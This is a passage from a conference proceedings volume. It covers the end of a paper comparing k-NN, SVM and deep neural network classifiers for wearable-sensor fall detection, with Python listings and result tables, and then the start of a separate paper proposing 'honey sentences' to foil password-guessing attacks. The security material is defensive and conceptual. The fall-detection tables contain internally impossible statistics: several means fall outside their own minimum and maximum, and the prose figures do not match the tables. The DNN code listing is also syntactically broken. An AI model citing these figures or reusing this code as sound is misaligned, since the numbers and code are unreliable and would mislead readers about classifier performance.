Fig. 6. Accelerometers and gyroscopes in smartphones and smartwatches have been used fall detection systems [15]
2.3
Fall Detection and Prevention Algorithms
The most common machine learning algorithms that have been used to analyze data to ascertain whether a fall has occurred are k-Nearest Neighbors (k-NN), Support Vector Machines (SVM) and Deep Neural Networks (DNN) [13,23,25]. Support Vector Machines and k-Nearest Neighbor algorithms execute quickly and perform well in terms of accuracy. DNNs require more time to train but the models created often result in increased accuracy [31]. To train these systems, labelled fall datasets are used. These datasets may contain video frames, accelerometer or gyroscope data leading up and including the fall. Such data are integral to training ML algorithms to classify scenarios as a “fall” and others as “not a fall”. Support Vector Machines, k-Nearest Neighbors and DNNs can classify the cases into defined groups to provide accurate analysis of a “fall” and “not a fall”. Support Vector Machines (SVM). A Support Vector Machine is a machine learning algorithm that is used in classification and regression problems [27]. The SVM algorithm classifies data that is plotted in an n-dimensional space based
508
E. R. Sykes
on the number of features. It does this by creating hyperplanes between classes of plotted points. When using SVM Kernel technique, these hyperplanes can be linear, polynomial, or Radial Basis Function (RBF) [27]. Figure 7 presents a visual representation of a SVM classifying data in 2D.
Fig. 7. An SVM trained with samples from two classes. The margin hyperplane is maximized and the samples on the margin are called Support Vectors [20]
The following listing presents the Support Vector Machine Algorithm in Python: # Split the dataset into training and test datasets. from sklearn.model_selection import train_test_split x_train, x_test, y_train, y_test= train_test_split(x, y, test_size= 0.20) # scaling from sklearn.preprocessing import StandardScaler st_x= StandardScaler() x_train= st_x.fit_transform(x_train) x_test= st_x.transform(x_test) # Support Vector Machine (Classifier) from sklearn.svm import SVC classifier = SVC(kernel=’linear’, random_state=0) classifier.fit(x_train, y_train) #Predict the test result y_pred= classifier.predict(x_test)
An Analysis of Current Fall Detection Systems
509
K-Nearest Neighbors (k-NN). The k-Nearest Neighbors algorithm is a popular machine learning algorithm used to classify data points based on its k’ closest neighbor. k is an integer variable that must be odd and greater than 1, typically 3,5, or 7. The actual value is determined based experimentation and accuracy of the results. The classification is determined by a Distance function: Euclidean (Eq. 1), Manhattan (Eq. 2), or Minkowski (Eq. 3) of the data point to be classified to its k nearest neighbors [28]. n Euclidean Distance = d(x, y) = (yi − xi )2
(1)
i=1 n M anhattan Distance = d(x, y) = ( |xi − yi |)
(2)
i=1 n 1 M inkowski Distance = d(x, y) = ( |xi − yi |) p
(3)
i=1
Figure 8 presents a visual representation of a k-NN classifier followed by the python program listing for the k-NN algorithm.
Fig. 8. Visualization of a K-NN classifier [28]
Data: training or test dataset (X_train, X_test, y_train, y_test) Results: fall classification from sklearn.neighbors import KNeighborsClassifier model_name = ‘K-Nearest Neighbor Classifier’ knnClassifier = KNeighborsClassifier(n_neighbors = 5, metric = ‘minkowski’, p=2) knn_model = Pipeline(steps=[(‘preprocessor’, preprocessorForFeatures), (‘classifier’ , knnClassifier)]) knn_model.fit(X_train, y_train) y_pred = knn_model.predict(X_test)
510
E. R. Sykes
Deep Neural Networks (DNN). Deep learning is a subset of machine learning. Deep Neural Networks (DNNs) consist of three or more layers of neural networks. DNNs attempt to simulate the behavior of the human brain enabling it to “learn” from large amounts of data [7]. Neural networks have hidden layers that can help to optimize and refine the accuracy. Figure 9 presents a visual representation of a DNN followed by the python program listing for a DNN classifier.
Fig. 9. Deep neural network architecture
import tensorflow as tf from keras import Sequential from keras.layers import Flatten, Dense # Build the Sequential model model = tf.keras.Sequential([ tf.keras.layers.Dense(200, input_shape=[16, 1]) tf.keras.layers.Dense(200, activation=tf.nn.relu), tf.keras.layers.Dense(1, activation=‘sigmoid’) ]) # Compile the model model.compile(optimizer=‘sgd’, loss=‘mean_squared_error’, metrics=[‘accuracy’]) # Train the model model.fit(X_train, y_train, epochs=5000) # Make a prediction print(model.predict([X_test]))
An Analysis of Current Fall Detection Systems
3
511
Methodology
This section describes various aspects of the methodology including: a) Materials, b) Dataset, c) Program (Pre-Processing, and the ML algorithm), and d) Evaluation and Analysis techniques. 3.1
Materials
We implemented the k-NN, SVM, and Deep Neural Networks ML algorithms in Python using scitkit-learn, and TensorFlow. The UCI open-source fall dataset comprised of simulated falls and daily activities was used to train and evaluate our algorithms [32]. The output of our classifiers was written to CSV files for post-analysis. 3.2
Dataset
The UCI dataset was used in this research. This comprehensive, openly available fall dataset consists of 20 falls and 16 daily living activities were performed by 17 volunteers with 5 repetitions while wearing 6 sensors (3.060 instances) that attached to their head, chest, waist, wrist, thigh and ankle [1]. The dataset is available at this site: https://archive.ics.uci.edu/ml/datasets/ Simulated+Falls+and+Daily+Living+Activities+Data+Set#. Each movement was performed 5 to 6 times using 6 sensors. Each sensor file provided the following 23 features (columns of data): counter, body temperature, velocity(x, y, z), orientation(w, x, y, z), acceleration(x, y, z), gyroscope(x, y, z), magnetic field(x, y, z), pressure ( N · m, roll, pitch, yaw ), and RSSI (Radio Signal Strength Indicator). The Xsens mtw sensor and development kit was used to acquire the data from the participants [1]. Figure 10 presents the file structure of the UCI fall dataset. The file structure is as follows: • • • • • •
An overarching Tests folder Participant folders: 100 series for men; 200 series for women Testler Export holds all the movement folders Movement folders: 800 series are daily activities; 900 series are falls Test 1 through 6 Text file, titled based on sensor number.
512
E. R. Sykes
Fig. 10. File structure of the UCI fall dataset
3.3
Program
The python program we created is divided into two scripts. The first is the preprocessing which retrieves the data from the sensor files and stores it into a multi-nested dictionary. The second script contain the code to configure, build, compile, train and test the ML classifiers. Pre-Processing Phase (Data Retrieval). In the pre-processing phase (data retrieval), the program loops through each main folder type in the file structure. The test number folder is opened and the requested sensor text file is passed as an argument to the function (see Fig. 11). The script makes a list of dictionaries with the key being the column names inside the file. This list is then saved to the dictionary that uses the test number a key. The test number dictionary is then saved to a test class keyed dictionary. Lastly, the test class dictionary is saved to a tester keyed dictionary. Nested dictionaries are used to facilitated easier searching for data by using the string keys instead of having to look through indexes. For example, a call to retrieve the data from the file is structured as follows: data[ 101 ][ 801 − P articipant 1 ][ T est 1 ][0][ Counter ]
(4)
The line of code above is equivalent to opening the sensor text file for the first participant doing the first test of the movement exercises and extracting the starting count number.
An Analysis of Current Fall Detection Systems
513
Fig. 11. Sensor data class
ML Classifiers. The following process was used for all three ML algorithms (k-NN, SVM, and DNN). The main script uses the three CSV files created by the processing script to run the ML algorithm on the data. The script starts by opening all 3 files, saving the data into TensorFlow Pandas dataframes, and removing any clear anomalies and outliers. The script proceeds to make 3 sets of data: a clean normalized full dataset, from which the training set, and test sets are generated. Following conventional data science practices, the training set was 80% of the entire dataset, with the remaining 20% reserved for testing. From the full UCI dataset, the following 16 features were used by our ML algorithms for fall classification, namely: velocity (x, y, z), orientation (w, x, y, z), acceleration (x, y, z), gyroscope (x, y, z), roll, pitch, and yaw.
514
3.4
E. R. Sykes
Evaluation and Analysis Techniques
The following types of quantitative analysis were performed: 1) evaluating and refining the classifiers using standard machine learning evaluation tools; and 2) determining the accuracy of classifiers using statistical tools. 1. Computing confusion matrices: Compare the classifier’s accuracy at predicting a fall. Confusion matrices and the associated measures (Accuracy, Precision and Sensitivity) are commonly used in the evaluation of machine learning algorithms, please see: [8,9,11,18]. Statistics for each participant for each classifier model was collected and confusion matrix derivations were computed as shown in Table 1. 2. Calculating standard descriptive statistics on the confusion matrix data for the entire group including minimum, maximum, mean, median, standard deviation, accuracy, precision, and sensitivity. Table 1. Confusion matrix derivations True Positives (TP):
Classifier correctly identifies that it was a fall
True Negatives (TN): Classifier correctly identifies that it was not a fall False Negatives (FN): Didn’t identify the fall when it should have False Positives (FP): Accuracy: Precision: Sensitivity: Specificity: Miss rate: False Positive Rate: F1 Score:
4
False Alarm – classifier said it was a fall when it shouldn’t have TP + TN TP + TN + FP + FN TP TP + FP TP TP + FN TN TN + TP FN FN + TP FP FP + TN 2T P 2T P + F P + F N
Analysis and Evaluation
Throughout our experiments we changed the values for the ML turning parameters, namely, k for the k-NN, the distance calculations for the SVM, and hyperparameters for the DNN. The results presented below represent the best we were able to achieve in terms of accuracy, precision and sensitivity for each respective algorithm.
An Analysis of Current Fall Detection Systems
4.1
515
Statistical Analysis to Test the Classifiers
This section presents the statistical analysis that was performed to test the effectiveness of the classifiers. Numerous confusion matrix computations were performed including supporting statistical measures and summative standard descriptive statistics. The confusion matrices show the range of values (min, max, mean, median and standard deviation) across all participants. These computational results are shown in Tables 2, 3, 4, 5, 6, and 7 based on models created from training data sets. Table 2. Primary confusion matrix results with supporting statistical measures and summative standard descriptive statistics for the K-NN algorithm True positive (%) True negative (%) False negative (%) False positive (%) Accuracy Min
2.993%
74.987%
1.503%
0.350%
68.111%
Max
9.125%
75.179%
5.729%
0.509%
78.497%
Mean
5.096%
72.069%
2.723%
0.113%
72.164%
Median
4.714%
72.598%
2.214%
0.042%
71.531%
Std Dev 1.912%
3.263%
1.377%
0.174%
1.386%
Table 3. Additional derived confusion matrix results for the K-NN algorithm Precision (%) Sensitivity (%) Specificity (%) Miss Rate (%) FPR (%) F1-Score (%) Min
71.667%
61.429%
69.448%
1.503%
0.570%
65.605%
Max
80.000%
73.239%
70.000%
5.889%
0.552%
64.553%
Mean
68.386%
65.847%
69.877%
2.836%
0.123%
68.774%
Median
69.920%
64.403%
69.957%
2.469%
0.044%
68.345%
Std Dev
2.900%
4.485%
0.190%
1.386%
0.190%
2.856%
Table 4. Primary confusion matrix results with supporting statistical measures and summative standard descriptive statistics for the SVM algorithm True Positive (%) True Negative (%) False Negative (%) False Positive (%) Accuracy (%) Min
0.452%
83.534%
1.030%
0.632%
83.633%
Max
1.539%
88.733%
6.630%
0.848%
88.643%
Mean
0.642%
86.237%
2.553%
0.122%
87.359%
Median
0.742%
87.251%
2.363%
0.510%
87.536%
Std Dev 0.632%
1.363%
1.363%
0.036%
1.553%
Table 5. Additional derived confusion matrix results for the SVM algorithm Precision (%) Sensitivity (%) Specificity (%) Miss Rate (%) FPR (%) F1-Score (%) Min
85.309%
8.643%
89.202%
1.626%
0.026%
15.635%
Max
90.740%
39.356%
90.735%
6.275%
0.634%
56.218%
Mean
93.645%
24.752%
89.843%
2.105%
0.062%
38.871%
Median
89.68%
23.235%
89.736%
2.602%
0.064%
38.502%
9.735%
0.072%
1.702%
0.062%
12.068%
Std Dev
8.862%
516
E. R. Sykes
Table 6. Primary confusion matrix results with supporting statistical measures and summative standard descriptive statistics for the DNN algorithm True Positive (%) True Negative (%) False Negative (%) False Positive (%) Accuracy (%) Min
0.526%
93.632%
1.592%
0.025%
91.593%
Max
1.642%
94.102%
6.205%
0.204%
94.499%
Mean
0.759%
92.842%
2.591%
0.064%
92.591%
Median
0.752%
95.942%
2.695%
0.052%
93.042%
Std Dev 0.692%
1.734%
1.264%
0.052%
1.462%
Table 7. Additional derived Confusion Matrix Results for the DNN Algorithm Precision (%) Sensitivity (%) Specificity (%) Miss Rate (%) FPR (%) F1-Score (%) Min
75.525%
8.254%
94.482%
1.152%
0.053%
15.592%
Max
97.252%
39.252%
96.542%
6.584%
0.254%
56.539%
Mean
90.525%
24.694%
94.359%
2.285%
0.064%
38.812%
Median
91.652%
23.528%
93.964%
2.592%
0.025%
38.053%
Std Dev
8.624%
9.264%
0.069%
1.654%
0.052%
12.253%
For our implementation using k-NN, as shown in Tables 2 and 3, on average 5.096% of results were true positives, 72.069% true negatives, 2.723% false negatives, and 0.113% false positives. The system exhibited a mean accuracy of 72.164%, precision of 68.386%, sensitivity of 64.847%, specificity of 69.877%, miss rate of 2.836%, false positive rate of 0.123%, and an F1-score of 68.774%. Our results using the SVM are presented in Tables 4 and 5 which show on average 0.642% of results were true positives, 86.237% true negatives, 2.553% false negatives, and 0.122% false positives. The system exhibited a mean accuracy of 87.359%, precision of 93.645%, sensitivity of 24.235%, specificity of 89.843%, miss rate of 2.105%, false positive rate of 0.062%, and an F1-score of 38.871%. Our Deep Neural Network outperformed the k-NN and SVM and these results are shown in Tables 6 and 7. These tables show on average 0.759% of results were true positives, 92.842% true negatives, 2.591% false negatives, and 0.064% false positives. The system exhibited a mean accuracy of 92.591%, precision of 90.525%, sensitivity of 24.694%, specificity of 94.359%, miss rate of 2.285%, false positive rate of 0.064%, and an F1-score of 38.812%.
5
Discussion
Our research showed that a waist and chest sensor are optimal when it comes to fall detection. This is primarily due to the accuracy that can be inferred when algorithms analyze and learn from the accelerometer and gyroscope data. Our findings also revealed that a device aimed to detect falls should ideally be placed on the waist, then chest and finally on the wrist. Using smartphones in combination with smartwatches as data collection sources could surpass the current detection systems of pendants and other sensors [5,31]. As smartwatches become more ubiquitous, they could be equipped
An Analysis of Current Fall Detection Systems
517
with an auto-tracking system jointly with a paired smartphone. These new tracking systems have the potential to be more accurate as they would be able track in real-time, an unintentional trip or fall by leveraging the combined data collected from multiple sensors from both devices [19]. Another related area of development is smart clothing. Smart clothing are clothes that have embedded sensors within the actual fabric. These garments are equipped with sensors such as ECG, EMG, temperature, HR, BP, SPO2 , pressure sensors (e.g., smart socks), accelerometers, gyroscopes, etc. Although, still primarily in the research realm, there are a few companies that are producing smart clothing for the consumer (e.g., Hexoskin, Sensoria, etc.). For example, Fig. 12 presents a new SmartSock by Sensoria [29]. This sock has several pressure sensors embedded within the fabric of the sock which provides information that is useful to determine balance issues, pressure strikes, gait analysis, etc. This data would be significant for new fall detection and fall prevention systems.
Fig. 12. Sensoria sock - with embedded pressure sensors [16]
As these garments gain popularity and prevalence within people’s daily attire, the opportunities to provide even better fall detection and prevention algorithms will emerge. Despite the substantial amount of work that has been conducted in this area, more research is needed, particularly those that focus on empirical studies and results.
6
Conclusion
After the analysis of nearly ten thousand sensor files, as collected from the wrist, waist and chest, the waist sensor was noted as having the highest accuracy, whereas the wrist had the least. With more efficient methods of collecting data and fall detection and prevention algorithms, the accuracy of fall detection and prevention systems will increase.
518
E. R. Sykes
In summary, the main contributions of this work are: 1. a critical review of current fall detection and prevention systems that are commercially available, 2. a comparison of three commonly used Machine Learning algorithms (k-NN, SVM, and DNN) for fall detection; our Deep Neural Network model achieved an accuracy of 92.591% at correctly detecting a fall, 3. recommendations for new fall detection and prediction systems. Combining the data from both a sensor in a smartwatch on the wrist, and a smartphone at the waist can provide real time data that can then be used in superior fall prevention algorithms. 6.1
Future Work
New fall detection and prediction systems should draw from all available information including smartphone and smartwatches, real-time sensor data (accelerometers, gyroscopes, pressure sensors), and vitals such as ECG, EMG, HR, BP, SPO2 , etc.) via smart clothing (e.g., smart socks with embedded pressure sensors, leggings that detect muscle activation and imbalances, etc.). Furthermore, patient data such as medications, allergies, and other medical conditions and historic trends should be incorporated in the dataset. Collectively, this data can be used by machine learning algorithms to learn patterns that precede falls. The aim for an AI fall prevention system is to provide as much advance warning when a fall is imminent. A key to future fall prediction systems will be smart clothing. As smart clothes with embedded sensors becoming increasingly more affordable, comfortable, reliable, and sophisticated (in terms of data collection, processing and potentially some degree of analysis), people will start wearing them on a daily basis. When this occurs, practical, consumer-based effective fall detection systems will emerge and will have a significant impact on improving the lives of those that have predisposition to falls and of those that care for these individuals through appropriate advance warning notifications. Acknowledgements. We would like to extend our gratitude to the Natural Sciences and Engineering Research Council of Canada (NSERC) for the resources to conduct this research. A special thanks to Patrick Ouellette for his contributions to this work.
References 1. Simulated falls and daily living activities data set data set. UCI Machine Learning Repository: Simulated falls and daily living activities data set data set 2. Galaxy medical alert system review. Seniors Bulletin Canada (2021) 3. Home system with fall detection. Galaxy Medical Alert Systems, Mar 2021 4. Securmedic review. Seniors Bulletin Canada (2021) 5. Abobakr, A., Hossny, M., Nahavandi, S.: A skeleton-free fall detection system from depth images using random decision forest. IEEE Syst. J. 12(3), 2994–3005 (2018)
An Analysis of Current Fall Detection Systems
519
6. Adhikari, K., Bouchachia, H., Nait-Charif, H.: Deep learning based fall detection using simplified human posture. Int. J. Comput. Syst. Eng. 13(5), 255–260 (2019) 7. Fiona, C.B.: World health organization 2020 guidelines on physical activity and sedentary behaviour. Br. J. Sports Med. 54(24), 1451–1462 (2020) 8. Elkan, C.: Evaluating classifiers (2012) 9. Forman, G., Scholz, M.: Apples-to-apples in cross-validation studies. ACM SIGKDD Explor. Newsl. 12, 11 (2010) 10. Statistics Canada Government of Canada. Health at a glance, Nov 2015 11. H.J Hamilton. Confusion matrix (2011). Accessed 05 Dec 2019 12. Jian, H., Zihao, Z., Weiguo, Y.: Interrupt-driven fall detection system realized via a kalman filter and KNN algorithm, pp. 579–584, October 2019 13. Horng, G.-J., Chen, K.-H.: The smart fall detection mechanism for healthcare under free-living conditions. Wireless Pers. Commun. 118(1), 715–753 (2021). https://doi.org/10.1007/s11277-020-08040-4 14. Huang, Z., Liu, Y., Fang, Y., Horn, B.K.: Video-based fall detection for seniors with human pose estimation. In: 4th International Conference on Universal Village, IEEE (2019) 15. Jakeman, R.: Best smartwatches 2023: Which? Best buys and expert buying advice (2023). https://www.which.co.uk/reviews/smartwatches/article/bestsmartwatches-abRh50p0riUM, 20 Jan 2023 16. Jeudy, L.: Canada: population, by gender and age 2021. Statista, December 2021 17. Telus Health: Telus health livingwell companion review. Seniors bulletin (2022). https://seniorsbulletin.ca/telus-health-livingwell-companion-review/, 12 Dec 2022 18. Kohavi, R., Provost, F.: Glossary of terms. special issue of applications of machine learning and the knowledge discovery process. Mach. Learn. 30, 271–274 (1998) 19. Adhikari, K., Bouchachia, H., Nait-Charif, H.: Long short-term memory networks based fall detection using unified pose estimation, pp. 236–240 (2019) 20. Larhmam, T.: Support vector machine (2022) 21. Lee, J.-S., Tseng, H.-H.: Development of an enhanced threshold-based fall detection system using smartphones with built-in accelerometers. IEEE Sens. J. 19(18), 8293–8302 (2019) 22. Liang, S., Chu, T., Lin, D., Ning, Y., Li, H., Zhao, G.: Pre-impact alarm system for fall detection using mems sensors and hmm-based SVM classifier, vol. 2018, pp. 4401–4405 (2018) 23. Nizam, Y., Mohd, M.N.H., Jamil, M.M.A.: Human fall detection from depth images using position and velocity of subject. Procedia Comput. Sci. 105, 131–137 (2017). 2016 IEEE International Symposium on Robotics and Intelligent Sensors, IRIS 2016, Tokyo, Japan, 17-20 December 2016 24. Pang, Z., Zheng, L., Tian, J., Kao-Walter, S., Dubrova, E., Chen, Q.: Design of a terminal solution for integration of in-home health care devices and services towards the internet-of-things. Enterp. Inf. Syst. 9, 86–116 (2019) 25. Phillips, D.R., Gyasi, R.M.: Global aging in a comparative context. The Gerontologist (2020) 26. Solbach, M.D., Tsotsos, J.K.: Vision-based fallen person detection for the elderly. In: IEEE International Conference on Computer Vision, pp. 1433-1442. IEEE (2019) 27. Noble, W.: What is a support vector machine? Nat. Biotechnol. 24, 1565–1567 (2006). https://doi.org/10.1038/nbt1206-1565 28. Tavish, M.: K nearest neighbor: KNN algorithm: KNN in python & r. Analytics Vidhya, October 2020
520
E. R. Sykes
29. Vigano, D.: Sensoria artificial intelligence sportswear (2022) 30. Shao, Y., Wang, X., Song, W., Ilyas, S., Guo, H., Chang, W.-S.: Feasibility of using floor vibration to detect human falls. Int. J. Environ. Res. Public Health 18(1), 200–206 (2021) 31. Luo, K., Chen, Y., Du, R., Xiao, Y.: Fall detection system based on real-time pose estimation and SVM, pp. 990–993 (2021) 32. Zdemir, B., Barshan, A.T.: Detecting falls with wearable sensors using machine learning techniques. Sensors 14, 10691–10708 (2014)
Authentication Scheme Using Honey Sentences Nuril Kaunaini Rofiatunnajah and Ari Moesriami Barmawi(B) School of Computing, Telkom University, Bandung, Indonesia [email protected], [email protected]
Abstract. Password-based authentication has dominated authentication schemes for decades because of its usability. However, password-based authentication is vulnerable to password-guessing attacks. To mitigate this attack, users have to choose a good password that is hard to guess. However, a password secured enough from password-guessing attacks will be difficult for users to memorize. One of the prior works that increase the complexity of password-guessing attacks without decreasing the usability is honey encryption (HE). HE produced a fake plausiblelooking plaintext as the decoy message when the attacker guessed the incorrect password. Some research implements the HE into an authentication scheme. However, the authentication scheme using HE has some weaknesses. The decoy message just uses one word and is still suspicious to the attacker. All of the decoy messages also have to be stored in the database. To address these problems, we proposed an authentication system that used honey sentences as the confirmation message instead of a word. Honey sentence is dynamically generated using natural language and has to be natural enough to fool the attacker. When the attacker inputs the incorrect password, the honey sentence is returned to the attacker, such that he could not determine the correctness of the guessed password. The experiment result showed that 80,67% of the generated sentences are considered natural, and the complexity of finding the correct password from all possible passwords is higher than the previous methods. Keywords: Authentication · Honey Sentences · Password-guessing Attack
1 Introduction Despite having more security flaws than other authentication methods, password-based authentication has dominated authentication schemes for decades. Password-based authentication is still used by users because of its usability [1]. User expect a scalable authentication system, easy to learn, needs less memory, and does not have anything to carry. However, the user password’s security flaws continue to become a significant concern. Password-based authentication is familiar to the user but is vulnerable to password-guessing attacks. The password-guessing attack is one of the attack scenarios when the attacker attempts to gain access to legitimate users’ resources by guessing all possible passwords [2]. The attacker generates all the password combinations based on the password © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 521–540, 2023. https://doi.org/10.1007/978-3-031-28073-3_37
522
N. K. Rofiatunnajah and A. M. Barmawi
space, user-defined dictionary, or using users’ personal information to find the correct password. To mitigate this attack, users have to choose a good password that is hard to guess. However, higher security usually means low usability. A password secured enough from password-guessing attacks will be difficult for users to memorize. One of the prior works that increase the complexity of password-guessing attacks without decreasing the usability is honey encryption [3]. Honey Encryption (HE) produces a “honey message” when the attacker guessed the incorrect password. “Honey message” is a fake plausible-looking plaintext that makes the attacker believe that he inserted the correct password. This method makes the attacker unable to confirm which one is the correct password from the guessed password list, such that the passwordguessing attacks are hard to perform. By using this method, users still can create the password they desired without security concerns. One authentication scheme that implements the HE, is a secure pin authentication in java smart card by Mohammed [4]. This method prevented password-guessing attacks by limiting the number of login attempts and creating multiple honey data. The honey data is fake data with the same type of information stored in the smart card. If the limit of login is reached, then honey data is returned. This action makes the attacker believe that he successfully retrieved the correct data. However, this research does not mention how to create the fake data, and all of this fake data is stored in the smart card, such that the complexity of the security is limited to the number of fake data that can be stored. An alternative approach that implements the HE, is an authentication scheme proposed by Jordan [5]. This method prevented password-guessing attacks by generating sweet words from users’ passwords and using the honey words. A honey word is generated and used as a fake message for each incorrect password. Suppose the attacker sends an incorrect password that is included in the sweet words. In this case, the corresponding fake message is returned to the attacker, and an alert is sent to the administrator. This method could give the attacker confidence that he successfully found the correct password. However, the fake message just using one word could raise suspicion of the attacker. All sweet words and decoy messages are also stored in the database, such that the security is limited to the number of fake messages that can be stored. The security of implemented HE in the prior authentication system has to be increased to prevent password-guessing attacks. The honey message has to look natural enough to fool the attacker. The message must also be dynamically generated, so the choice is not limited to the stored fake messages. This improvement must be performed without decreasing the users’ options in creating a password. In this research, we proposed an authentication system using a natural languagebased confirmation message. The proposed method changed the confirmation message into a honey sentence using natural language. Instead of rejecting the unattended request, the attacker received a honey sentence, such that he could not determine the correctness of the guessed password. The honey sentence is dynamically generated, such that one desired password from users could generate multiple types of sentences. One of these sentences is used as a seed sentence and stored in the database. The seed sentence is a sentence that is used to generate another possible sentence for the password. Generating multiple types of sentences is proposed to hide the pattern of sentence generation.
Authentication Scheme Using Honey Sentences
523
The experiment result showed that 80,67% of the generated sentences are natural. The complexity of password-guessing is increased by the number of possible honey sentences, such that the probability of finding the correct password from all possible passwords decreases. The rest of the paper is organized as follows. Section 2 discusses the implementation details of previous methods, and Sect. 3 discusses the implementation details of the proposed method. Section 4 discusses the experimental results as well as the proposed method’s security analysis. Finally, in Sect. 5, we present our work’s research findings and conclusion.
2 Previous Methods This section discussed the overview and the security analysis of previous methods: a secure pin authentication in java smart card proposed by Mohammed [4] and an authentication scheme using honey encryption proposed by Jordan [5]. 2.1 Overview of Previous Methods Previous methods [4, 5] prevented password-guessing attacks by generating sweet words from users’ passwords, such that the sweet words are very similar to the correct password. If the attacker tries to access the resource by sending an incorrect password included in the sweet words, a fake message is returned to the attacker, and an alert is sent to the administrator. This method consists of two phases: the sign-up phase and the login phase. The sign-up phase aims to register users’ passwords (P) and messages (M). First, the sweet words (P’) are generated from the password and used as the decoy password. Then, the system generates a fake message (M’) and a random number (seed) for all passwords, including the decoy password. Furthermore, every message is encrypted into ciphertext (C) using the corresponding seed. Finally, the correct password is mapped into the encrypted users’ message, while the decoy password is mapped into the fake ciphertext (C’). The result of this map is stored in the database. The sign-up phase of the previous method is shown below in Fig. 1.
Fig. 1. Sign-up phase of the previous method.
524
N. K. Rofiatunnajah and A. M. Barmawi
The objective of the login phase is to authenticate the users that tried to access the resources. First, the password (P) is received from the users. Second, the corresponding seed (seed) and ciphertext (C) for the inputted password are retrieved from the database. Third, the ciphertext is decrypted into the message (M) using the seed. Finally, the correct password from users retrieves the correct ciphertext, such that the correct message is returned to users. The login phase of the previous method is shown below in Fig. 2.
Fig. 2. Login phase of the previous method.
2.2 Security Analysis of Previous Methods The attack scenario of previous methods (Fig. 3) [4, 5] is conducted by sending an incorrect password (P’) by the attacker. If the incorrect password is included in the sweet words, then a fake ciphertext (C’) is retrieved and decrypted into a fake message (M’). A fake message is sent to the attacker, and an alert is sent to the administrator. Meanwhile, if the password sent by the attacker is not included in the sweet words, the system raises an error.
Fig. 3. Attack scenario of the previous method.
To prevent against password-guessing attacks, the security of the previous methods depends on the probability of finding the correct password from all the possible passwords. The total possible passwords depend on the total combination of passwords and the number of words that can be used as a fake message. Suppose the number of possible
Authentication Scheme Using Honey Sentences
525
fake messages is nwords , the length of bits used in the password is nbits , and every bit can be a value of 1 or 0. Thus, the probability of finding the correct password from all possible passwords and fake messages is calculated using Eq. 1. probability to find the correct password =
1 2nbits · nwords
(1)
In the previous methods, the fake message is generated from the states of the US, such that nwords is limited to a small number and the probability of finding the correct password is high. Furthermore, the fake message generated from a single word, primarily if the word is not related to the message, raises suspicion for the attacker. The map of generated sweet words is stored in the database for all users. Errors are raised when the password is not included in the sweet words. Therefore, all possible passwords have to be stored to prevent errors. Choosing just a few passwords raises errors and gives attention to the attacker. Meanwhile, storing all possible passwords costs many resources.
3 Proposed Method The objective of the proposed method is to prevent against password-guessing attacks. The password-guessing attack is one of the attack scenarios when the attacker attempts to gain access to legitimate users’ resources by guessing all possible passwords. The idea to prevent this attack is to make the attacker not determine the correctness of the guessed password. Therefore, instead of rejecting the unattended request, the confirmation message is changed into something that is more disguised. Furthermore, an authentication method based on natural language is proposed. In this case, the confirmation message is changed into a honey sentence. The honey sentence is dynamically generated using natural language. In the proposed method, if the user is eligible, he receives a message that can be predicted by himself. Otherwise, he receives a fake message. The proposed scheme consists of two phases: the sign-up and the login phase. The objective of the sign-up phase is to register the user’s password to the server. This phase is initiated by the user sending their password to the server. The password is encoded into a sentence in natural language. This sentence is sent back to the user and stored in the server’s database. Because it is a natural language, users can easily remember the sentence and use it as a secret message. Moreover, this sentence does not attract attention if stored in the database and is treated as a regular sentence. After the user successfully registers, the login phase is conducted. The objective of this phase is to authenticate the user that tried to access the resources. The user sent the password and a salt number to the server. This password is used to generate a new sentence (sentence2). Then, the server compares sentence2 with the sentence stored in the database (sentence1). A correct password produces sentence2 that holds the same information as sentence1. The server found that both sentences were equal and sent sentence2 back to the user as the confirmation message. Users can predict the confirmation sentence from the secret message and salt. This action can be used to create mutual authentication and verify whether they communicate with the eligible server or not.
526
N. K. Rofiatunnajah and A. M. Barmawi
In the attacking scenario, an attacker tries to send a guessed password. The password is generated into one sentence, sentence2’. Further, this sentence is compared to sentence1. The server found that the information stored in sentence1 and sentence2’ are unequal. In this case, the server generates a new fake message and sends it back to the attacker. The server alerts the administrator that someone tried to intrude. Suppose the attacker does not know either the password or the secret message, then he can not determine whether the password was correct or not by only knowing the fake message he received. Since the previous methods [4, 5] generate the fake message just using one word, thus the probability of finding the correct password in the proposed method is lower than in the previous methods. The naturalness of generated sentences becomes important for achieving an undistinguishable confirmation message. To produce a sentence that looks natural, we can use the existing corpus as a reference. A natural sentence can be generated by combining words used in the corpus. These words are obtained from the corpus by parsing the sentences. The parsing method is used in the preprocessing phase and the sentence generation based on corpus word combination is used in the sign-up and login phase. The predicate and object are generated based on the Indonesian sentence corpus. Meanwhile, an English name corpus is used to generate a more flexible subject. Furthermore, the details of this proposed method are discussed in three subsections: the preprocessing phase, the sign-up phase, and the login phase. 3.1 Preprocessing Phase Based on the discussion in the previous section, the preprocessing phase is conducted to parse the sentences from the corpus. Each Indonesian language corpus sentence is parsed into words following the required syntax function. A syntax function of the basic sentence in the Indonesian language consists of three components: subject, predicate, and object [6]. As for the English name corpus, each name is parsed based on the syllable rule as written in the following subsection. Further, the parsed component from both corpora is mapped to create the required lookup tables. The preprocess of these corpora is further discussed in two subsections: sentence preprocessing and name preprocessing. Sentence Preprocessing. Sentence preprocessing aims to parse the sentences and create the lookup tables from the Indonesian language corpus. This process consists of two subprocesses: corpus cleaning and the bigram and sentence analysis. The corpus cleaning process is conducted to clean and parse the sentences in the corpus into two components: predicate and object. The bigram and sentence analysis aims to map every component to create three lookup tables: mapBigramGroup, mapBigramToPredicate, and mapPredicateToObject. The Indonesian sentence corpus used in this method is taken from Leipzig’s corpus [7]. This corpus contains one million sentences taken from the Wikipedia site. The details of this process are conducted as follows: Corpus Cleaning. The corpus cleaning process is initiated by removing every word not included in the Indonesian dictionary [8]. Then, every compound sentence is parsed
Authentication Scheme Using Honey Sentences
527
into basic Indonesian sentences. The parsing process is conducted according to the occurrence of conjunctions or punctuation marks between 2 sentences. Furthermore, the word labeled as a predicate is extracted based on the syntax rule in Standard Indonesian Grammar [6]. We consider a word as a predicate if the word is a verb or the word has the affix “me-“ or “ber-“. Finally, we marked the remaining sentence as an object for every detected predicate. Suppose the original sentence is “Perang itu berlangsung selama 524 tahun dan membentuk sejarah dunia. (The war is lasted for 524 years and shaped the history of the world)”. In this sentence, two words are detected as a predicate: “berlangsung (last)” and “membentuk (shape/form)”. The result of the sentence cleaning and parsing of this sentence is shown in Table 1.
Table 1. Example result of sentence cleaning and parsing process Predicate
Object
berlangsung (last)
